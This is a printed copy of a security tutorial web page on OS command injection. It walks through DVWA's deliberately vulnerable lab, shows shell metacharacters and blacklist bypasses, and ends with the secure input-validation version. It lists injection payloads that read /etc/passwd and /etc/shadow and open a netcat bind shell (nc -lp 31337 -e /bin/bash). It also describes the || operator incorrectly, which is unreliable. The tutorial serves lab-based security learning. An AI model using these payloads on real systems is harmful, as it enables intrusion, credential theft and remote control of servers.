Command Injection - Security Tutorials https://securitytutorials.co.

uk/command-injection/

Command Injection Search …

CATEGORIES

◦ Expliots & Pentesting

◦ General Admin Tasks
Command injection also is known as OS Command injection, ◦ Hacking Basics
is an attack technique used to execute commands on a host ◦ Hacking Wireless Networks
operating system via a vulnerable web application. ◦ Networking
Command Injection attacks are possible when an application ◦ Raspberry Pi
passes unsafe user-supplied data (forms, cookies, HTTP
headers, and so on) to a system shell. These commands are
executed with the privileges of the vulnerable application. ARCHIVES
These attacks are due to the web application not having
su�cient input validation on the command being run. Select Month

POPULAR TUTORIALS

◦ HTTP Header Internal IP

Disclosure

◦ Brute Forcing Passwords

with THC-Hydra

1 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

◦ Brute Forcing Web Logins

with DVWA

◦ Scanning and Port

Forwarding through a
Meterpreter Session

◦ Top 10 Security YouTube

Channels

◦ Installing Kali Linux in

VirtualBox

To test for command Injection you use Metacharacters to

string commands together just like you can from the
MISSION STATEMENT
terminal or command prompt

Security Tutorials Mission is to

for example, type this into a Linux terminal:
create clear up to date
tutorials on hacking, cyber
security, PCI Compliance.
ping -c 4 127.0.0.1 && ls

Please Subscribe to Security

Tutorials to receive
Adding && between these commands runs the ls command
noti�cations of new tutorials
if the preceding ping command is successful.
as they are released.

There are a whole bunch of other Metacharacters you can

use, some of the more common ones I have listed below.

MetaCharacters

• ; The semicolon is the most common metacharacter used

to test an injection �aw. The shell will run all the
commands in sequence separated by the semicolon.
• & Separate multiple commands on one command line. It
runs the �rst command then the second command.

2 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

• && Runs the command following && only if the preceding

command is successful.
• | The Pipe, pipes the output of the �rst command into the
second command.
• || Redirects the standard outputs of the �rst command to
standard input of the second command.
• ‘ The quote is used to force the shell to interpret and run
commands between backticks. Following is an example of
this command: Variable=”OS version ‘uname -a'” && echo
$variable.
• () The brackets are used to nest commands.
• # The Hash is used as a command line comment.

Command injection With DVWA

DVWA stands for Damn Vulnerable Web Application and if

you don’t already have DVWA installed and not checked out
my tutorial on setting up a vulnerable Web Server check that
out here.

login into DVWA and start o� by putting the DVWA Security

down to low and click submit.

3 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Now select the Command Injection button and you should

be presented with a page that says ‘ping a device’ and gives
you a box to enter an IP address. enter any IP address and it
will ping that address.

If we take a look at the source by clicking the view source

button in the bottom right-hand corner of DVWA, we can see
what the Application is doing in the background.

4 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Once you have clicked the view source you will be presented
with a new window displaying the PHP code above, which the
DVWA team have really nicely commented for us.

Basically, the program takes our input in the form of an IP

address then determines what the backend Operating
system is (windows or Linux) then runs the appropriate ping
command, It then echoes back the output of the command
into the web application

As the web application interacts with the backend Operating

system and is not sanitizing our input, we can introduce
MetaCharactors to string extra commands, allowing us to
break out of its intended ping command and run our own
commands directly on the backend operating system.

5 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Add the Metacharacter && after your IP address, this allows

you to string the second command onto the �rst and will run
as long as the �rst command is successful, as I know the
backend operating system (in this case) is Linux, I

try ls -la to list all the directories the web application is

running in.

After running the command you can see the ping command
run and then the ls command listing all the directories
where the web application is running.

Security Level Medium

Switch the Security level up to medium and try the command

again from security level Low.

127.0.0.1&&ls -la

notice the command runs �ne with just the IP address but as
soon as you add the metacharacter ( && ) and your injected
command it does not output anything and reloads the page.

If you take a look at the source you can see the programmer

6 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

has modi�ed his code from security level low adding a

blacklist blocking two metacharacters being added to the
input && and ;.

Lucky for us there are plenty of other metacharacters to try.

Changing the metacharacter to a single & or any other that

is not on the blacklist, still allows us to inject our command.

Security Level High

Now Increase the security level of DVWA to High, then

notice using the same command from Security level medium
above now no longer works.

7 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

Now let’s open up the source code and take a look at what
changes have been made.

It looks like the programmer has extended the

metacharacters which are blacklisted in the web application.

But all is not lost, notice the highlighted area in the blacklist
above, there is an error in the syntax, the programmer has
added an extra space after the | (pipe) Metacharacter and
the backtick. This means we should still be able to use
command injection as long as we don’t put any spaces in our
command and use the pipe like this.

8 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

This shows that even though the programmer has made a

thorough blacklist one little extra space still lets us inject
our commands into the web application.

Security Level Impossible

On Security level Impossible this is how it should be done. If

we �rst take a look at the source we can see what changes
have been made to the program.

As you can see from the commented Code above the

programmer has got rid of the Blacklist altogether and is
now instead validating the user’s input, anything other then
an IP address gives the error message “You have entered an
invalid IP”.

Things to Try yourself

If you have also installed Mutillidea and bWAPP from my

9 of 14 11/17/2022, 11:46 AM
Command Injection - Security Tutorials https://securitytutorials.co.uk/command-injection/

setting up a vulnerable LAMP Server tutorial, Have a go at

the command injection section of these.

Remember any command you can run in the terminal you

can run after a command injection, you don’t have to just use
ls as I have in my examples, try some of these.

127.0.0.1|whoami shows you the user the web application is

currently running as.

127.0.0.1|uname -a shows the Operating System version

the web server is running.

127.0.0.1&&ifcon�g shows you all the network

con�guration information.

127.0.0.1&&php -v Gives you PHP version running on web

applications server.

127.0.0.1&&cat /etc/passwd displays all the users on the

backend Linux Server

127.0.0.1&&/etc/shadow displays all hashed passwords but

only if you are running with root privileges.

NetCat Remote Shell

If NetCat (nc) is installed on your vulnerable web server and

it has the -e option, you should be able to create a remote
shell like so.

127.0.0.1&&nc -lp 31337 -e /bin/bash

Then from your pc connect to this listener by typing using

the webservers IP address.

10 of 14 11/17/2022, 11:46 AM